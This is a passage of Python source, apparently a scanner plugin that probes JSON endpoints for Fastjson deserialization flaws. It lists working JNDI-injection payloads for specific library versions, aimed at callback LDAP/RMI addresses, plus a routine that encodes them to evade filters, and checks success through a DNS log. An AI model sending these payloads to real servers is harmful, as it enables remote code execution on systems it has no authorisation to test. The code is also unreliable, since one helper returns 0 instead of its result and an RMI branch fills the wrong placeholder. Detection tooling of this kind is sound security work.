"beanFactory": { "@type": "org.springframework.jndi.support.SimpleJndiBeanFactory", "shareableResources": [ "%(ldap)s" ] } } }''', "type": "ldap" }, { "vul": "unknown", "payload": '''{ "raasd2nd1": Set[ { "@type": "org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor", "beanFactory": { "@type": "org.springframework.jndi.support.SimpleJndiBeanFactory", "shareableResources": [ "%(ldap)s" ] }, "adviceBeanName": "%(ldap)s" }, { "@type": "org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor" } ]}''', "type": "ldap" }, { "vul": "unknown", "payload": '''{ "rand1": { "@type": "com.mchange.v2.c3p0.JndiRefForwardingDataSource", "jndiName": "%(ldap)s", "loginTimeout": 0 } }''', "type": "ldap" }] saveflags = {} for payload in payloads: random_str = get_random_str(5).lower() + payload.get("vul", "") data_with_payload = "" if payload.get("type") == "ldap": ldapaddr, ldaphexdata = generate( self.parse.getrootpath() + random_str, "ldap") data_with_payload = payload.get("payload") % {"ldap": ldapaddr} saveflags[ldaphexdata] = (data_with_payload, payload.get("vul", "")) elif payload.get("type") == "rmi": rmiaddr, rmihexdata = generate( self.parse.getrootpath() + random_str, "rmi") data_with_payload = payload.get("payload") % {"rmi": rmiaddr} saveflags[rmihexdata] = (data_with_payload, payload.get("vul", "")) req = self.parse.generaterequest({"data": data_with_payload}) r = request(**req) # query i = 0 success = False for hexdata, msg in saveflags.items(): payload, vul = msg sleep = True if i == 0 else False res, resdata = query_reverse(hexdata, sleep) if res: self.result.append({ "name": self.name, "url": self.parse.getrootpath(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "payload": payload, "version": vul, "others": "dnslog res:{}".format(resdata), "request": self.parse.getrequestraw(), "response": self.parse.getresponseraw() } }) success = True i += 1 if success: if not self.can_output(self.parse.getrootpath() + self.name): # 其他进程如果发现了,则不在输出 self.can_output(self.parse.getrootpath() + self.name, True)
def verify(self): if not self.dictdata.get("request").get("content_type") == 4: # data数据类型为json return if not self.can_output(self.parse.getrootpath() + self.name): # 限定只输出一次 return def transform_json(json_dict): """递归编码json中的所有字段""" def random_encode(s): """随机将给定字符串对每一个字符编码为ASCII/UNICODE编码""" encoded_str = '' for c in s: rnd = randint(0, 100) if rnd < 51: encoded_str += '\\x{:>02x}'.format(ord(c)) else: encoded_str += '\\u{:>04x}'.format(ord(c)) return encoded_str def transform_iterable(iterable): """递归编码可迭代对象中的所有字段""" # TODO # 目前强制将所有可迭代对象都转为了list,后续优化为不进行强制转换,返回原本的对象类型 result_list = [] for it in iterable: if isinstance(it, str): result = random_encode(it) elif isinstance(it, dict): result = transform_json(it) elif isinstance(it, Iterable): result = transform_iterable(it) else: result = it result_list.append(result) return 0 keys = json_dict.keys() for key in keys: # 递归遍历json对象 encoded_key = random_encode(key) value = json_dict[key] if isinstance(value, str): encoded_value = random_encode(value) elif isinstance(value, dict): encoded_value = transform_json(value) elif isinstance(value, Iterable): encoded_value = transform_iterable(value) else: encoded_value = value json_dict.pop(key) json_dict.update( {encoded_key: encoded_value} ) return json_dict payloads = [ { "vul": "ver=1.2.47", "payload": '''{ "rasdnd1": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "randfd2": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "%(ldap)s", "autoCommit": true } }''', "type": "ldap" }, { "vul": "ver=1.2.43", "payload": '''{"raasdnd1":{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"%(ldap)s","autoCommit":true]}}''', "type": "ldap", "code": False }, { "vul": "ver=1.2.42", "payload": '''{ "rasdfnd1": { "@type": "LLcom.sun.rowset.JdbcRowSetImpl;;", "dataSourceName": "%(ldap)s", "autoCommit": true } }''', "type": "ldap" }, { "vul": "1.2.25<=ver<=1.2.41", "payload": '''{ "ranfasdfd1": { "@type": "Lcom.sun.rowset.JdbcRowSetImpl;", "dataSourceName": "%(ldap)s", "autoCommit": true } }''', "type": "ldap" }, { "vul": "<=1.2.24", "payload": '''{ "radassnd1": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "%(ldap)s", "autoCommit": true } }''', "type": "ldap" }, { "vul": "ibatis-core:3.0", "payload": '''{ "raasdnd1": { "@type": "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory", "properties": { "data_source": "%(ldap)s" } } }''', "type": "ldap" }, { "vul": "spring-context:4.3.7.RELEASE", "payload": '''{ "ransdasd1": { "@type": "org.springframework.beans.factory.config.PropertyPathFactoryBean", "targetBeanName": "%(ldap)s", "propertyPath": "foo", "beanFactory": { "@type": "org.springframework.jndi.support.SimpleJndiBeanFactory", "shareableResources": [ "%(ldap)s" ] } } }''', "type": "ldap" }, { "vul": "unknown", "payload": '''{ "raasd2nd1": Set[ { "@type": "org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor", "beanFactory": { "@type": "org.springframework.jndi.support.SimpleJndiBeanFactory", "shareableResources": [ "%(ldap)s" ] }, "adviceBeanName": "%(ldap)s" }, { "@type": "org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor" } ]}''', "type": "ldap" }, { "vul": "unknown", "payload": '''{ "rand1": { "@type": "com.mchange.v2.c3p0.JndiRefForwardingDataSource", "jndiName": "%(ldap)s", "loginTimeout": 0 } }''', "type": "ldap" } ] saveflags = {} for payload in payloads: random_str = get_random_str(5).lower() + payload.get("vul", "") data_with_payload = "" if payload.get("type") == "ldap": ldapaddr, ldaphexdata = generate(self.parse.getrootpath() + random_str, "ldap") if payload.get("code",True): try: json_payload = loads(payload.get("payload") % {"ldap": ldapaddr}) except: print("get error") print(payload.get("payload")) continue data_with_payload = dumps(transform_json(json_payload)).replace('\\\\', '\\') else: data_with_payload=payload.get("payload") % {"ldap": ldapaddr} saveflags[ldaphexdata] = (data_with_payload, payload.get("vul", "")) elif payload.get("type") == "rmi": rmiaddr, rmihexdata = generate(self.parse.getrootpath() + random_str, "rmi") if payload.get("code", True): json_payload = loads(payload.get("payload") % {"rmi": rmiaddr}) data_with_payload = dumps(transform_json(json_payload)).replace('\\\\', '\\') else: data_with_payload=payload.get("payload") % {"ldap": rmiaddr} saveflags[rmihexdata] = (data_with_payload, payload.get("vul", "")) req = self.parse.generaterequest({"data": data_with_payload}) r = request(**req) # query i = 0 success = False for hexdata, msg in saveflags.items(): payload, vul = msg sleep = True if i == 0 else False res, resdata = query_reverse(hexdata, sleep) if res: self.result.append({ "name": self.name, "url": self.parse.getrootpath(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "payload": payload, "version": vul, "others": "dnslog res:{}".format(resdata), "request": self.parse.getrequestraw(), "response": self.parse.getresponseraw() } }) success = True i += 1 if success: if not self.can_output(self.parse.getrootpath() + self.name): # 其他进程如果发现了,则不在输出 self.can_output(self.parse.getrootpath() + self.name, True)